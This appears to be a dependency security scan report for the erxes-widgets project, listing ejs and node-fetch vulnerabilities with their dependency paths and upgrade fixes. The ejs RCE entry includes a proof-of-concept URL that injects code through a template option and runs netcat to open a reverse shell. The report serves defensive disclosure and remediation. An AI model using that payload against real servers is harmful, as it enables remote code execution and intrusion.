Vulnerabilities

 4 via 6 paths

Dependencies

 171

Source

 GitHub

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
  • 3
Status
  • 4
  • 0
  • 0

high severity

Remote Code Execution (RCE)

  • Vulnerable module: ejs
  • Introduced through: ejs@2.7.4

Detailed paths

  • Introduced through: erxes-widgets@erxes/erxes-widgets ejs@2.7.4
    Remediation: Upgrade to ejs@3.1.7.

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options parameter of renderFile, which makes it possible to inject code into outputFunctionName.

Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.

PoC:

Creation of reverse shell:

http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s

Remediation

Upgrade ejs to version 3.1.7 or higher.

References

Remote Code Execution (RCE) vulnerability report

medium severity

Information Exposure

  • Vulnerable module: node-fetch
  • Introduced through: react@16.4.2 and react-dom@16.4.2

Detailed paths

  • Introduced through: erxes-widgets@erxes/erxes-widgets react@16.4.2 fbjs@0.8.18 isomorphic-fetch@2.2.1 node-fetch@1.7.3
    Remediation: Upgrade to react@16.5.0.
  • Introduced through: erxes-widgets@erxes/erxes-widgets react-dom@16.4.2 fbjs@0.8.18 isomorphic-fetch@2.2.1 node-fetch@1.7.3
    Remediation: Upgrade to react-dom@16.5.0.

Overview

node-fetch is a light-weight module that brings window.fetch to node.js

Affected versions of this package are vulnerable to Information Exposure when fetching a remote url with Cookie, if it get a Location response header, it will follow that url and try to fetch that url with provided cookie. This can lead to forwarding secure headers to 3th party.

Remediation

Upgrade node-fetch to version 2.6.7, 3.1.1 or higher.

References

Information Exposure vulnerability report

medium severity

Denial of Service (DoS)

  • Vulnerable module: node-fetch
  • Introduced through: react@16.4.2 and react-dom@16.4.2

Detailed paths

  • Introduced through: erxes-widgets@erxes/erxes-widgets react@16.4.2 fbjs@0.8.18 isomorphic-fetch@2.2.1 node-fetch@1.7.3
    Remediation: Upgrade to react@16.5.0.
  • Introduced through: erxes-widgets@erxes/erxes-widgets react-dom@16.4.2 fbjs@0.8.18 isomorphic-fetch@2.2.1 node-fetch@1.7.3
    Remediation: Upgrade to react-dom@16.5.0.

Overview

node-fetch is a light-weight module that brings window.fetch to node.js

Affected versions of this package are vulnerable to Denial of Service (DoS). Node Fetch did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure.

Remediation

Upgrade node-fetch to version 2.6.1, 3.0.0-beta.9 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Improper Control of Dynamically-Managed Code Resources

  • Vulnerable module: ejs
  • Introduced through: ejs@2.7.4

Detailed paths

  • Introduced through: erxes-widgets@erxes/erxes-widgets ejs@2.7.4
    Remediation: Upgrade to ejs@3.1.10.

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources due to the lack of certain pollution protection mechanisms. An attacker can exploit this vulnerability to manipulate object properties that should not be accessible or modifiable.

Note:

Even after updating to the fix version that adds enhanced protection against prototype pollution, it is still possible to override the hasOwnProperty method.

Remediation

Upgrade ejs to version 3.1.10 or higher.

References

Improper Control of Dynamically-Managed Code Resources vulnerability report